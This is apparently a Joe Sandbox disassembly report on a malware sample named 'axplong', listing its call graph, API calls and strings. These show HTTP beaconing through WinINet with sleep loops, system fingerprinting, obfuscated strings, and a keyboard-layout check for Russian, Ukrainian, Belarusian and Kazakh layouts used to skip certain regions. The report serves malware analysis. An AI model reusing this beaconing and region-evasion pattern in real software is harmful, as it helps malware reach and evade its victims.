296f8f 14140->14142 14141->14142 14142->14116 14144 297190 14143->14144 14146 2971a4 __dosmaperr 14144->14146 14158 29b568 14144->14158 14146->14110 14148 29b9f2 14147->14148 14151 29b9f8 __cftof __dosmaperr 14148->14151 14152 29ba2d 14148->14152 14150 29ba28 14150->14132 14151->14132 14153 29ba57 14152->14153 14156 29ba3d __cftof __dosmaperr 14152->14156 14154 29683a __fassign 4 API calls 14153->14154 14153->14156 14157 29ba81 14154->14157 14155 29b9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14155->14157 14156->14150 14157->14155 14157->14156 14159 29b592 __cftof 14158->14159 14160 29b5ae __dosmaperr ___free_lconv_mon 14159->14160 14162 29d6ef 14159->14162 14160->14146 14165 29d6fc __fassign 14162->14165 14163 29d727 RtlAllocateHeap 14164 29d73a __dosmaperr 14163->14164 14163->14165 14164->14160 14165->14163 14165->14164 14167 297338 14166->14167 14169 29733e 14167->14169 14170 297036 14167->14170 14169->14123 14171 297042 __dosmaperr 14170->14171 14176 29b87b 14171->14176 14173 297068 14173->14169 14174 29705a __dosmaperr 14174->14173 14175 29b87b RtlAllocateHeap 14174->14175 14175->14173 14179 29b6de 14176->14179 14178 29b894 14178->14174 14180 29b6ee 14179->14180 14182 29b6f5 14180->14182 14183 2a1ef8 14180->14183 14182->14178 14186 2a1d22 14183->14186 14185 2a1f0f 14185->14182 14187 2a1d54 14186->14187 14189 2a1d40 __cftof __dosmaperr 14186->14189 14188 29b568 RtlAllocateHeap 14187->14188 14187->14189 14188->14189 14189->14185 14190 29d6ef 14193 29d6fc __fassign 14190->14193 14191 29d727 RtlAllocateHeap 14192 29d73a __dosmaperr 14191->14192 14191->14193 14193->14191 14193->14192 14287 267400 14288 267435 shared_ptr 14287->14288 14292 26752f shared_ptr 14288->14292 14293 27d041 14288->14293 14290 2675bd 14290->14292 14297 27cff7 14290->14297 14294 27d052 14293->14294 14295 27d05a 14294->14295 14301 27d0c9 14294->14301 14295->14290 14298 27d007 14297->14298 14299 27d0ab RtlWakeAllConditionVariable 14298->14299 14300 27d0af 14298->14300 14299->14292 14300->14292 14302 27d0d7 SleepConditionVariableCS 14301->14302 14304 27d0f0 14301->14304 14302->14304 14304->14294 14391 26aca0 14393 26adf0 __cftof 14391->14393 14392 26ae16 shared_ptr 14393->14392 14396 265500 14393->14396 14395 26af7e 14397 265520 14396->14397 14399 265620 14397->14399 14400 262280 14397->14400 14399->14395 14403 262240 14400->14403 14404 262256 14403->14404 14407 298667 14404->14407 14410 297456 14407->14410 14409 262264 14409->14397 14411 297496 14410->14411 14414 29747e __cftof __dosmaperr 14410->14414 14412 29683a __fassign 4 API calls 14411->14412 14411->14414 14413 2974ae 14412->14413 14416 297a11 14413->14416 14414->14409 14418 297a22 14416->14418 14417 297a31 __cftof __dosmaperr 14417->14414 14418->14417 14423 297fb5 14418->14423 14428 297c0f 14418->14428 14433 297c35 14418->14433 14443 297d83 14418->14443 14424 297fbe 14423->14424 14426 297fc5 14423->14426 14452 29799d 14424->14452 14426->14418 14427 297fc4 14427->14418 14429 297c18 14428->14429 14430 297c1f 14428->14430 14431 29799d 4 API calls 14429->14431 14430->14418 14432 297c1e 14431->14432 14432->14418 14434 297c56 __cftof __dosmaperr 14433->14434 14438 297c3c 14433->14438 14434->14418 14435 297db6 14441 297dc4 14435->14441 14442 297dd8 14435->14442 14460 29808e 14435->14460 14437 297def 14437->14442 14456 2981dd 14437->14456 14438->14434 14438->14435 14438->14437 14438->14441 14441->14442 14464 298537 14441->14464 14442->14418 14444 297db6 14443->14444 14445 297d9c 14443->14445 14446 29808e 4 API calls 14444->14446 14448 297dd8 14444->14448 14450 297dc4 14444->14450 14445->14444 14447 297def 14445->14447 14445->14450 14446->14450 14447->14448 14449 2981dd 4 API calls 14447->14449 14448->14418 14449->14450 14450->14448 14451 298537 4 API calls 14450->14451 14451->14448 14453 2979af __dosmaperr 14452->14453 14454 298979 4 API calls 14453->14454 14455 2979d2 __dosmaperr 14454->14455 14455->14427 14458 2981f8 14456->14458 14457 29822a 14457->14441 14458->14457 14468 29c65f 14458->14468 14461 2980a7 14460->14461 14475 29d199 14461->14475 14463 29815a 14463->14441 14466 2985aa 14464->14466 14467 298554 14464->14467 14465 29c65f __cftof 4 API calls 14465->14467 14466->14442 14467->14465 14467->14466 14471 29c504 14468->14471 14470 29c677 14470->14457 14472 29c514 14471->14472 14473 29683a __fassign GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14472->14473 14474 29c519 __cftof __dosmaperr 14472->14474 14473->14474 14474->14470 14476 29d1bf 14475->14476 14477 29d1a9 __cftof __dosmaperr 14475->14477 14476->14477 14478 29d256 14476->14478 14479 29d25b 14476->14479 14477->14463 14481 29d27f 14478->14481 14482 29d2b5 14478->14482 14488 29c9b0 14479->14488 14484 29d29d 14481->14484 14485 29d284 14481->14485 14505 29ccc9 14482->14505 14501 29ceb3 14484->14501 14494 29d00f 14485->14494 14489 29c9c2 14488->14489 14490 29683a __fassign GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14489->14490 14491 29c9d6 14490->14491 14492 29c9de __alldvrm __cftof __dosmaperr _strrchr 14491->14492 14493 29ccc9 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14491->14493 14492->14477 14493->14492 14497 29d03d 14494->14497 14495 29d076 14495->14477 14496 29d0af 14498 29cd6b GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14496->14498 14497->14495 14497->14496 14499 29d088 14497->14499 14498->14495 14500 29cf3e GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14499->14500 14500->14495 14502 29cee0 14501->14502 14503 29cf1f 14502->14503 14504 29cf3e GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14502->14504 14503->14477 14504->14503 14506 29cce1 14505->14506 14507 29cd46 14506->14507 14508 29cd6b GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14506->14508 14507->14477 14508->14507 14283 272e20 14284 272ec5 __cftof 14283->14284 14285 2732f2 InternetCloseHandle InternetCloseHandle 14284->14285 14286 273331 shared_ptr std::_Xinvalid_argument 14285->14286 14516 276ae0 14517 276b10 14516->14517 14520 2746c0 14517->14520 14519 276b5c Sleep 14519->14517 14523 2746fb 14520->14523 14537 274a72 shared_ptr 14520->14537 14521 274e69 shared_ptr 14521->14519 14523->14537 14539 26bd60 14523->14539 14525 274f25 shared_ptr 14526 274fee shared_ptr 14525->14526 14530 276ab6 14525->14530 14558 267d00 14526->14558 14528 274ffd 14564 2682b0 14528->14564 14532 2746c0 11 API calls 14530->14532 14531 274a0d 14533 26bd60 5 API calls 14531->14533 14531->14537 14534 276b5c Sleep 14532->14534 14533->14537 14534->14530 14535 274753 shared_ptr __dosmaperr 14535->14531 14536 298979 4 API calls 14535->14536 14536->14531 14537->14521 14550 2665b0 14537->14550 14538 275016 shared_ptr 14538->14519 14540 26bdb2 14539->14540 14543 26c14e shared_ptr 14539->14543 14541 26bdc6 InternetOpenW InternetConnectA 14540->14541 14540->14543 14542 26be3d 14541->14542 14544 26be53 HttpOpenRequestA 14542->14544 14543->14535 14545 26be71 shared_ptr 14544->14545 14546 26bf13 HttpSendRequestA 14545->14546 14547 26bf2b shared_ptr 14546->14547 14548 26bfb3 InternetReadFile 14547->14548 14549 26bfda 14548->14549 14551 26660f 14550->14551 14552 262280 4 API calls 14551->14552 14553 266699 shared_ptr 14552->14553 14554 262280 4 API calls 14553->14554 14555 266822 shared_ptr 14553->14555 14556 266727 shared_ptr 14554->14556 14555->14525 14556->14555 14557 262280 4 API calls 14556->14557 14557->14556 14559 267d66 shared_ptr __cftof 14558->14559 14560 267ea3 GetNativeSystemInfo 14559->14560 14561 267ea7 14559->14561 14563 267eb8 shared_ptr 14559->14563 14560->14561 14561->14563 14568 298a81 14561->14568 14563->14528 14566 268315 shared_ptr __cftof 14564->14566 14565 268454 GetNativeSystemInfo 14567 268333 14565->14567 14566->14565 14566->14567 14567->14538 14569 2986d7 4 API calls 14568->14569 14570 298a9f 14569->14570 14570->14563 14571 278700 14572 27875a __cftof 14571->14572 14578 279ae0 14572->14578 14574 278784 14577 27879c 14574->14577 14582 2643b0 14574->14582 14576 278809 std::_Throw_future_error 14579 279b15 14578->14579 14588 262ca0 14579->14588 14581 279b46 14581->14574 14583 27be0f InitOnceExecuteOnce 14582->14583 14584 2643ca 14583->14584 14585 2643d1 14584->14585 14586 296beb 9 API calls 14584->14586 14585->14576 14587 2643e4 14586->14587 14589 262cdd 14588->14589 14590 27be0f InitOnceExecuteOnce 14589->14590 14591 262d06 14590->14591 14592 262d48 14591->14592 14593 262d11 14591->14593 14597 27be27 14591->14597 14604 262400 14592->14604 14593->14581 14598 27be33 std::_Throw_future_error 14597->14598 14599 27bea3 14598->14599 14600 27be9a 14598->14600 14601 262aa0 10 API calls 14599->14601 14607 27bdaf 14600->14607 14603 27be9f 14601->14603 14603->14592 14625 27b506 14604->14625 14606 262432 14608 27cb61 InitOnceExecuteOnce 14607->14608 14609 27bdc7 14608->14609 14610 27bdce 14609->14610 14613 296beb 14609->14613 14610->14603 14612 27bdd7 14612->14603 14614 296bf7 14613->14614 14615 298aaf __fassign 4 API calls 14614->14615 14616 296c26 14615->14616 14617 296c43 14616->14617 14618 296c35 14616->14618 14620 2968bd 4 API calls 14617->14620 14619 296c99 9 API calls 14618->14619 14621 296c3f 14619->14621 14622 296c5d 14620->14622 14621->14612 14623 296c99 9 API calls 14622->14623 14624 296c71 ___free_lconv_mon 14622->14624 14623->14624 14624->14612 14626 27b521 std::_Throw_future_error 14625->14626 14627 298aaf __fassign 4 API calls 14626->14627 14629 27b588 __fassign 14626->14629 14628 27b5cf 14627->14628 14629->14606 14641 27a140 14642 27a1c0 14641->14642 14648 277040 14642->14648 14644 27a1fc shared_ptr 14645 27a3ee shared_ptr 14644->14645 14652 263ea0 14644->14652 14647 27a3d6 14650 277081 __cftof __Mtx_init_in_situ 14648->14650 14649 2772b6 14649->14644 14650->14649 14658 262e80 14650->14658 14653 263ede 14652->14653 14654 263f08 14652->14654 14653->14647 14655 263f18 14654->14655 14705 262bc0 14654->14705 14655->14647 14659 262ec6 14658->14659 14660 262f3e GetCurrentThreadId 14658->14660 14662 27c5dc GetSystemTimePreciseAsFileTime 14659->14662 14661 262f54 14660->14661 14678 262faf 14660->14678 14667 27c5dc GetSystemTimePreciseAsFileTime 14661->14667 14661->14678 14663 262ed2 14662->14663 14664 262fde 14663->14664 14668 262edd __Mtx_unlock 14663->14668 14665 27c19a 10 API calls 14664->14665 14666 262fe4 14665->14666 14669 27c19a 10 API calls 14666->14669 14670 262f79 14667->14670 14668->14666 14671 262f2f 14668->14671 14669->14670 14672 27c19a 10 API calls 14670->14672 14673 262f80 __Mtx_unlock 14670->14673 14671->14660 14671->14678 14672->14673 14674 27c19a 10 API calls 14673->14674 14675 262f98 __Cnd_broadcast 14673->14675 14674->14675 14676 27c19a 10 API calls 14675->14676 14675->14678 14677 262ffc 14676->14677 14679 27c5dc GetSystemTimePreciseAsFileTime 14677->14679 14678->14649 14688 263040 shared_ptr __Mtx_unlock 14679->14688 14680 263185 14681 27c19a 10 API calls 14680->14681 14682 26318b 14681->14682 14683 27c19a 10 API calls 14682->14683 14684 263191 14683->14684 14685 27c19a 10 API calls 14684->14685 14693 263153 __Mtx_unlock 14685->14693 14686 263167 14686->14649 14687 27c19a 10 API calls 14689 26319d 14687->14689 14688->14680 14688->14682 14688->14686 14690 2630f2 GetCurrentThreadId 14688->14690 14690->14686 14691 2630fb 14690->14691 14691->14686 14692 27c5dc GetSystemTimePreciseAsFileTime 14691->14692 14694 26311f 14692->14694 14693->14686 14693->14687 14694->14680 14694->14684 14694->14693 14696 27bc7c 14694->14696 14699 27baa2 14696->14699 14698 27bc8c 14698->14694 14700 27bacc 14699->14700 14701 27bad4 __Xtime_diff_to_millis2 14700->14701 14702 27ce9b _xtime_get GetSystemTimePreciseAsFileTime 14700->14702 14701->14698 14703 27baff __Xtime_diff_to_millis2 14702->14703 14703->14701 14704 27ce9b _xtime_get GetSystemTimePreciseAsFileTime 14703->14704 14704->14701 14706 262bce 14705->14706 14712 27b777 14706->14712 14708 262c02 14709 262c09 14708->14709 14718 262c40 14708->14718 14709->14647 14711 262c18 std::_Throw_future_error 14713 27b784 14712->14713 14717 27b7a3 Concurrency::details::_Reschedule_chore 14712->14717 14721 27caa7 14713->14721 14715 27b794 14715->14717 14723 27b74e 14715->14723 14717->14708 14729 27b72b 14718->14729 14720 262c72 shared_ptr 14720->14711 14722 27cac2 CreateThreadpoolWork 14721->14722 14722->14715 14724 27b757 Concurrency::details::_Reschedule_chore 14723->14724 14727 27ccfc 14724->14727 14726 27b771 14726->14717 14728 27cd11 TpPostWork 14727->14728 14728->14726 14730 27b737 14729->14730 14731 27b747 14729->14731 14730->14731 14733 27c9a8 14730->14733 14731->14720 14734 27c9bd TpReleaseWork 14733->14734 14734->14731 14738 27b7e9 14739 27b6e5 11 API calls 14738->14739 14741 27b811 Concurrency::details::_Reschedule_chore 14739->14741 14740 27b836 14743 27b648 11 API calls 14740->14743 14741->14740 14745 27cade 14741->14745 14744 27b84e 14743->14744 14746 27cafc 14745->14746 14747 27caec TpCallbackUnloadDllOnCompletion 14745->14747 14746->14740 14747->14746 14735 296559 14736 2963f7 __fassign 2 API calls 14735->14736 14737 29656a 14736->14737 14305 26e410 14306 26e435 14305->14306 14308 26e419 14305->14308 14308->14306 14309 26e270 14308->14309 14310 26e280 __dosmaperr 14309->14310 14311 298979 4 API calls 14310->14311 14313 26e2bd std::_Xinvalid_argument 14311->14313 14312 26e435 14312->14308 14313->14312 14314 26e270 4 API calls 14313->14314 14314->14313 14509 2686b0 14510 2686b6 14509->14510 14511 296659 RtlAllocateHeap 14510->14511 14512 2686c3 14511->14512 14513 2686d6 14512->14513 14514 2966e7 4 API calls 14512->14514 14515 2686d0 14514->14515 14749 26dfd0 recv 14750 26e032 recv 14749->14750 14751 26e067 recv 14750->14751 14752 26e0a1 14751->14752 14753 26e1c3 14752->14753 14754 27c5dc GetSystemTimePreciseAsFileTime 14752->14754 14755 26e1fe 14754->14755 14756 27c19a 10 API calls 14755->14756 14757 26e268 14756->14757 14194 271dd0 14196 271e6b shared_ptr __dosmaperr 14194->14196 14195 271e78 shared_ptr std::_Xinvalid_argument 14196->14195 14206 298979 14196->14206 14201 272265 shared_ptr 14201->14195 14210 296659 14201->14210 14202 27268b shared_ptr __dosmaperr 14202->14195 14203 298979 4 API calls 14202->14203 14204 272759 14203->14204 14204->14195 14217 265df0 14204->14217 14207 298994 14206->14207 14224 2986d7 14207->14224 14209 29899e 14209->14201 14248 2965a2 14210->14248 14212 27267a 14212->14195 14213 2966e7 14212->14213 14214 2966f3 14213->14214 14216 2966fd __cftof __dosmaperr 14214->14216 14260 296670 14214->14260 14216->14202 14219 265e28 14217->14219 14218 265f0e shared_ptr 14218->14195 14219->14218 14220 266060 RegOpenKeyExA 14219->14220 14222 26645a shared_ptr 14220->14222 14223 2660b3 __cftof 14220->14223 14221 266153 RegEnumValueW 14221->14223 14222->14195 14223->14221 14223->14222 14225 2986e9 14224->14225 14226 29683a __fassign 4 API calls 14225->14226 14229 2986fe __cftof __dosmaperr 14225->14229 14228 29872e 14226->14228 14228->14229 14230 298925 14228->14230 14229->14209 14231 298962 14230->14231 14233 298932 14230->14233 14241 29d2e9 14231->14241 14235 298941 __fassign 14233->14235 14236 29d30d 14233->14236 14235->14228 14237 29683a __fassign 4 API calls 14236->14237 14239 29d32a 14237->14239 14238 29d33a 14238->14235 14239->14238 14245 29f07f 14239->14245 14242 29d2f4 14241->14242 14243 29b4bb __fassign 4 API calls 14242->14243 14244 29d304 14243->14244 14244->14235 14246 29683a __fassign 4 API calls 14245->14246 14247 29f09f __cftof __fassign __freea 14246->14247 14247->14238 14249 2965ae 14248->14249 14250 2965b5 __cftof __dosmaperr 14249->14250 14252 29a783 14249->14252 14250->14212 14253 29a78f 14252->14253 14256 29a827 14253->14256 14255 29a7aa 14255->14250 14257 29a84a 14256->14257 14258 29d6ef RtlAllocateHeap 14257->14258 14259 29a890 ___free_lconv_mon 14257->14259 14258->14259 14259->14255 14261 296692 14260->14261 14263 29667d __cftof __dosmaperr ___free_lconv_mon 14260->14263 14261->14263 14264 299ef9 14261->14264 14263->14216 14265 299f11 14264->14265 14267 299f36 14264->14267 14265->14267 14268 2a02f8 14265->14268 14267->14263 14269 2a0304 14268->14269 14271 2a030c __cftof __dosmaperr 14269->14271 14272 2a03ea 14269->14272 14271->14267 14273 2a040c 14272->14273 14275 2a0410 __cftof __dosmaperr 14272->14275 14273->14275 14276 29fb7f 14273->14276 14275->14271 14277 29fbcc 14276->14277 14278 29683a __fassign 4 API calls 14277->14278 14281 29fbdb __cftof 14278->14281 14279 29fe7b 14279->14275 14280 29d2e9 4 API calls 14280->14281 14281->14279 14281->14280 14282 29c4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 14281->14282 14282->14281 14630 279310 14631 279363 14630->14631 14632 279325 14630->14632 14633 27d041 SleepConditionVariableCS 14632->14633 14634 27932f 14633->14634 14634->14631 14635 27cff7 RtlWakeAllConditionVariable 14634->14635 14635->14631 14315 27b85e 14320 27b6e5 14315->14320 14317 27b886 14328 27b648 14317->14328 14319 27b89f 14321 27b6f1 Concurrency::details::_Reschedule_chore 14320->14321 14322 27b722 14321->14322 14338 27c5dc 14321->14338 14322->14317 14326 27b70c __Mtx_unlock 14327 262ad0 10 API calls 14326->14327 14327->14322 14329 27b654 Concurrency::details::_Reschedule_chore 14328->14329 14330 27b6ae 14329->14330 14331 27c5dc GetSystemTimePreciseAsFileTime 14329->14331 14330->14319 14332 27b669 14331->14332 14333 262ad0 10 API calls 14332->14333 14334 27b66f __Mtx_unlock 14333->14334 14335 262ad0 10 API calls 14334->14335 14336 27b68c __Cnd_broadcast 14335->14336 14336->14330 14337 262ad0 10 API calls 14336->14337 14337->14330 14346 27c382 14338->14346 14340 27b706 14341 262ad0 14340->14341 14342 262adc 14341->14342 14343 262ada 14341->14343 14363 27c19a 14342->14363 14343->14326 14347 27c3d8 14346->14347 14349 27c3aa 14346->14349 14347->14349 14352 27ce9b 14347->14352 14349->14340 14350 27c42d __Xtime_diff_to_millis2 14350->14349 14351 27ce9b _xtime_get GetSystemTimePreciseAsFileTime 14350->14351 14351->14350 14353 27ceaa 14352->14353 14354 27ceb7 __aulldvrm 14352->14354 14353->14354 14356 27ce74 14353->14356 14354->14350 14359 27cb1a 14356->14359 14360 27cb2b GetSystemTimePreciseAsFileTime 14359->14360 14362 27cb37 14359->14362 14360->14362 14362->14354 14364 27c1c2 14363->14364 14365 27c1a4 14363->14365 14364->14364 14365->14364 14367 27c1c7 14365->14367 14370 262aa0 14367->14370 14369 27c1de std::_Throw_future_error 14369->14365 14384 27be0f 14370->14384 14372 262abf 14372->14369 14373 298aaf __fassign 4 API calls 14375 296c26 14373->14375 14374 262ab4 14374->14372 14374->14373 14376 296c43 14375->14376 14377 296c35 14375->14377 14379 2968bd 4 API calls 14376->14379 14378 296c99 9 API calls 14377->14378 14380 296c3f 14378->14380 14381 296c5d 14379->14381 14380->14369 14382 296c99 9 API calls 14381->14382 14383 296c71 ___free_lconv_mon 14381->14383 14382->14383 14383->14369 14387 27cb61 14384->14387 14388 27cb6f InitOnceExecuteOnce 14387->14388 14390 27be22 14387->14390 14388->14390 14390->14374 14636 296974 14637 29698c 14636->14637 14638 296982 14636->14638 14639 2968bd 4 API calls 14637->14639 14640 2969a6 ___free_lconv_mon 14639->14640

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 763 26bd60-26bdac 764 26bdb2-26bdb6 763->764 765 26c1a1-26c1c6 call 277f30 763->765 764->765 766 26bdbc-26bdc0 764->766 770 26c1f4-26c20c 765->770 771 26c1c8-26c1d4 765->771 766->765 769 26bdc6-26be4f InternetOpenW InternetConnectA call 277870 call 265b20 766->769 797 26be53-26be6f HttpOpenRequestA 769->797 798 26be51 769->798 775 26c212-26c21e 770->775 776 26c158-26c170 770->776 773 26c1d6-26c1e4 771->773 774 26c1ea-26c1f1 call 27d593 771->774 773->774 778 26c26f-26c274 call 296b9a 773->778 774->770 780 26c224-26c232 775->780 781 26c14e-26c155 call 27d593 775->781 782 26c176-26c182 776->782 783 26c243-26c25f call 27cf21 776->783 780->778 788 26c234 780->788 781->776 789 26c188-26c196 782->789 790 26c239-26c240 call 27d593 782->790 788->781 789->778 796 26c19c 789->796 790->783 796->790 800 26bea0-26bf0f call 277870 call 265b20 call 277870 call 265b20 797->800 801 26be71-26be80 797->801 798->797 815 26bf13-26bf29 HttpSendRequestA 800->815 816 26bf11 800->816 803 26be96-26be9d call 27d593 801->803 804 26be82-26be90 801->804 803->800 804->803 817 26bf5a-26bf82 815->817 818 26bf2b-26bf3a 815->818 816->815 821 26bf84-26bf93 817->821 822 26bfb3-26bfd4 InternetReadFile 817->822 819 26bf50-26bf57 call 27d593 818->819 820 26bf3c-26bf4a 818->820 819->817 820->819 824 26bf95-26bfa3 821->824 825 26bfa9-26bfb0 call 27d593 821->825 826 26bfda 822->826 824->825 825->822 829 26bfe0-26c090 call 294180 826->829
                          APIs
                          • InternetOpenW.WININET(002B8D70,00000000,00000000,00000000,00000000), ref: 0026BDED
                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0026BE11
                          • HttpOpenRequestA.WININET(?,00000000), ref: 0026BE5B
                          • HttpSendRequestA.WININET(?,00000000), ref: 0026BF1B
                          • InternetReadFile.WININET(?,?,000003FF,?), ref: 0026BFCD
                          • InternetCloseHandle.WININET(?), ref: 0026C0A7
                          • InternetCloseHandle.WININET(?), ref: 0026C0AF
                          • InternetCloseHandle.WININET(?), ref: 0026C0B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                          • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4,$invalid stoi argument$stoi argument out of range
                          • API String ID: 688256393-3871744267
                          • Opcode ID: 61b98ebf9bb271cca72b8e9d5a4c464940b2129bb05e119b54fef2e33e28a7a2
                          • Instruction ID: f9accafffb472b36006baab5cb7621f2ae85e8ff8079855a5c5a778caf24992b
                          • Opcode Fuzzy Hash: 61b98ebf9bb271cca72b8e9d5a4c464940b2129bb05e119b54fef2e33e28a7a2
                          • Instruction Fuzzy Hash: E9B1F8B15201189BEB24DF28CC84BEEBB79EF45304F6081A9F90897291D7719ED4CF95
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
                          • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-,
                          • API String ID: 3545240790-1323897623
                          • Opcode ID: aa3a23d88058151b3851dc18e7028cbed4555133c3eb8677bd325764034f70e3
                          • Instruction ID: 8c29c6e9a7b4e5fd9caa2cd7b9a343ddaaacd4ccc7ad27d79f2aab05953d45e8
                          • Opcode Fuzzy Hash: aa3a23d88058151b3851dc18e7028cbed4555133c3eb8677bd325764034f70e3
                          • Instruction Fuzzy Hash: FF231471A201588BEB19DB28CD8979DBB769F81304F54C1D8E00CA72C6EB755FA4CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 918 265df0-265eee 924 265ef0-265efc 918->924 925 265f18-265f25 call 27cf21 918->925 926 265f0e-265f15 call 27d593 924->926 927 265efe-265f0c 924->927 926->925 927->926 930 265f26-2660ad call 296b9a call 27e080 call 277f30 * 5 RegOpenKeyExA 927->930 947 2660b3-266143 call 294020 930->947 948 266478-266481 930->948 974 266466-266472 947->974 975 266149-26614d 947->975 950 266483-26648e 948->950 951 2664ae-2664b7 948->951 955 2664a4-2664ab call 27d593 950->955 956 266490-26649e 950->956 952 2664e4-2664ed 951->952 953 2664b9-2664c4 951->953 959 2664ef-2664fa 952->959 960 26651a-266523 952->960 957 2664c6-2664d4 953->957 958 2664da-2664e1 call 27d593 953->958 955->951 956->955 961 26659e-2665a3 call 296b9a 956->961 957->958 957->961 958->952 965 266510-266517 call 27d593 959->965 966 2664fc-26650a 959->966 968 266525-266530 960->968 969 26654c-266555 960->969 965->960 966->961 966->965 978 266542-266549 call 27d593 968->978 979 266532-266540 968->979 971 266557-266566 969->971 972 266582-26659d call 27cf21 969->972 980 266578-26657f call 27d593 971->980 981 266568-266576 971->981 974->948 982 266153-266187 RegEnumValueW 975->982 983 266460 975->983 978->969 979->961 979->978 980->972 981->961 981->980 989 26644d-266454 982->989 990 26618d-2661ad 982->990 983->974 989->982 993 26645a 989->993 995 2661b0-2661b9 990->995 993->983 995->995 996 2661bb-26624d call 277c50 call 278090 call 277870 * 2 call 265c60 995->996 996->989
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
